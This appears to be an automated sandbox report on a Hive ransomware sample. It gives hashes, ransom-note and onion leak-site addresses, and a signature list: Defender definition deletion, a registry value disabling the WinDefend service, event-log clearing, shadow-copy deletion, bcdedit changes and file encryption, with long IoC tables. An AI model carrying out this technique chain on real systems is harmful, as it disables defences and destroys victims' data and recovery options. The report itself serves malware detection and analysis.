Analysis
max time kernel: 152s
max time network: 132s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 14:43

Static task: static1
Behavioral task: behavioral1
  Sample: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  Resource: win10-en-20211208

General
Target: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
Size: 3.8MB
MD5: cc827025f0fc7997097626f534635501
SHA1: 9434cc56f7e8b0a246dbc3a799e7850cdb87c9c5
SHA256: 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3
SHA512: 855159b33f3fb2d859dcfd5468d1bfd5b3b2a6258c80a6bc0e1b98ca38b8e8c3161893307c0726f611dc4709c734c89931893db9b6529353257e916e589c5d8c

Malware Config
Extracted
Path: C:\wPfq_HOW_TO_DECRYPT.txt
Family: hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoCs)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes:
  pid | process
  320 | MpCmdRun.exe
- Hive
  A ransomware written in Golang first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoCs)
  Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe
- Clears Windows event logs (1 TTPs)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes:
  pid | process
  1696 | bcdedit.exe
  936 | bcdedit.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_disabled.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Common Files\System\msadc\de-DE\msadcor.dll.mui | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CASCADE\CASCADE.INF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\deploy\splash.gif.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_F_COL.HXK.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0233070.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\wPfq_HOW_TO_DECRYPT.txt | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL022.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0304853.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File created | C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\wPfq_HOW_TO_DECRYPT.txt | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN105.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\fr-FR\gadget.xml | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\localizedStrings.js | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-desk.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\management\snmp.acl.template.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Windows Media Player\de-DE\wmlaunch.exe.mui | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Apothecary.thmx.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\wPfq_HOW_TO_DECRYPT.txt | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_OFF.GIF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\THMBNAIL.PNG.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099169.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL092.XML.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Mazatlan.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301480.WMF.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE_COL.HXC.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryMergeLetter.dotx.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_IAAAACAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions.css.NdChF7tYzXgqR0joTxWtWzSm7a-MmTGX8zJOctsBxPv_AAAAAAAAAAA0.vl6ia | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
  pid | process
  1768 | vssadmin.exe
- Opens file in notepad (likely ransom note) (1 IoCs)
  Processes:
  pid | process
  2504 | notepad.exe
- Runs net.exe
- Runs ping.exe (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
  pid | process
  1904 | powershell.exe
  2124 | powershell.exe
  944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  description | pid | process
  Token: SeSecurityPrivilege | 1120 | wevtutil.exe
  Token: SeBackupPrivilege | 1120 | wevtutil.exe
  Token: SeSecurityPrivilege | 1136 | wevtutil.exe
  Token: SeBackupPrivilege | 1136 | wevtutil.exe
  Token: SeSecurityPrivilege | 1208 | wevtutil.exe
  Token: SeBackupPrivilege | 1208 | wevtutil.exe
  Token: SeIncreaseQuotaPrivilege | 1836 | wmic.exe
  Token: SeSecurityPrivilege | 1836 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 1836 | wmic.exe
  Token: SeLoadDriverPrivilege | 1836 | wmic.exe
  Token: SeSystemProfilePrivilege | 1836 | wmic.exe
  Token: SeSystemtimePrivilege | 1836 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 1836 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 1836 | wmic.exe
  Token: SeCreatePagefilePrivilege | 1836 | wmic.exe
  Token: SeBackupPrivilege | 1836 | wmic.exe
  Token: SeRestorePrivilege | 1836 | wmic.exe
  Token: SeShutdownPrivilege | 1836 | wmic.exe
  Token: SeDebugPrivilege | 1836 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 1836 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 1836 | wmic.exe
  Token: SeUndockPrivilege | 1836 | wmic.exe
  Token: SeManageVolumePrivilege | 1836 | wmic.exe
  Token: 33 | 1836 | wmic.exe
  Token: 34 | 1836 | wmic.exe
  Token: 35 | 1836 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 1756 | wmic.exe
  Token: SeSecurityPrivilege | 1756 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 1756 | wmic.exe
  Token: SeLoadDriverPrivilege | 1756 | wmic.exe
  Token: SeSystemProfilePrivilege | 1756 | wmic.exe
  Token: SeSystemtimePrivilege | 1756 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 1756 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 1756 | wmic.exe
  Token: SeCreatePagefilePrivilege | 1756 | wmic.exe
  Token: SeBackupPrivilege | 1756 | wmic.exe
  Token: SeRestorePrivilege | 1756 | wmic.exe
  Token: SeShutdownPrivilege | 1756 | wmic.exe
  Token: SeDebugPrivilege | 1756 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 1756 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 1756 | wmic.exe
  Token: SeUndockPrivilege | 1756 | wmic.exe
  Token: SeManageVolumePrivilege | 1756 | wmic.exe
  Token: 33 | 1756 | wmic.exe
  Token: 34 | 1756 | wmic.exe
  Token: 35 | 1756 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 1756 | wmic.exe
  Token: SeSecurityPrivilege | 1756 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 1756 | wmic.exe
  Token: SeLoadDriverPrivilege | 1756 | wmic.exe
  Token: SeSystemProfilePrivilege | 1756 | wmic.exe
  Token: SeSystemtimePrivilege | 1756 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 1756 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 1756 | wmic.exe
  Token: SeCreatePagefilePrivilege | 1756 | wmic.exe
  Token: SeBackupPrivilege | 1756 | wmic.exe
  Token: SeRestorePrivilege | 1756 | wmic.exe
  Token: SeShutdownPrivilege | 1756 | wmic.exe
  Token: SeDebugPrivilege | 1756 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 1756 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 1756 | wmic.exe
  Token: SeUndockPrivilege | 1756 | wmic.exe
  Token: SeManageVolumePrivilege | 1756 | wmic.exe
  Token: 33 | 1756 | wmic.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
  description | pid | process | target process
  PID 944 wrote to memory of 576 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 576 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 576 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 576 wrote to memory of 776 | 576 | net.exe | net1.exe
  PID 576 wrote to memory of 776 | 576 | net.exe | net1.exe
  PID 576 wrote to memory of 776 | 576 | net.exe | net1.exe
  PID 944 wrote to memory of 1300 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1300 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1300 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 1300 wrote to memory of 992 | 1300 | net.exe | net1.exe
  PID 1300 wrote to memory of 992 | 1300 | net.exe | net1.exe
  PID 1300 wrote to memory of 992 | 1300 | net.exe | net1.exe
  PID 944 wrote to memory of 640 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 640 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 640 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 640 wrote to memory of 1196 | 640 | net.exe | net1.exe
  PID 640 wrote to memory of 1196 | 640 | net.exe | net1.exe
  PID 640 wrote to memory of 1196 | 640 | net.exe | net1.exe
  PID 944 wrote to memory of 1996 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1996 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1996 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 1996 wrote to memory of 408 | 1996 | net.exe | net1.exe
  PID 1996 wrote to memory of 408 | 1996 | net.exe | net1.exe
  PID 1996 wrote to memory of 408 | 1996 | net.exe | net1.exe
  PID 944 wrote to memory of 2020 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 2020 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 2020 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 2020 wrote to memory of 1432 | 2020 | net.exe | net1.exe
  PID 2020 wrote to memory of 1432 | 2020 | net.exe | net1.exe
  PID 2020 wrote to memory of 1432 | 2020 | net.exe | net1.exe
  PID 944 wrote to memory of 1252 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1252 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1252 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 1252 wrote to memory of 1876 | 1252 | net.exe | net1.exe
  PID 1252 wrote to memory of 1876 | 1252 | net.exe | net1.exe
  PID 1252 wrote to memory of 1876 | 1252 | net.exe | net1.exe
  PID 944 wrote to memory of 1068 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1068 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1068 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 1068 wrote to memory of 1916 | 1068 | net.exe | net1.exe
  PID 1068 wrote to memory of 1916 | 1068 | net.exe | net1.exe
  PID 1068 wrote to memory of 1916 | 1068 | net.exe | net1.exe
  PID 944 wrote to memory of 1012 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 944 wrote to memory of 1012 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
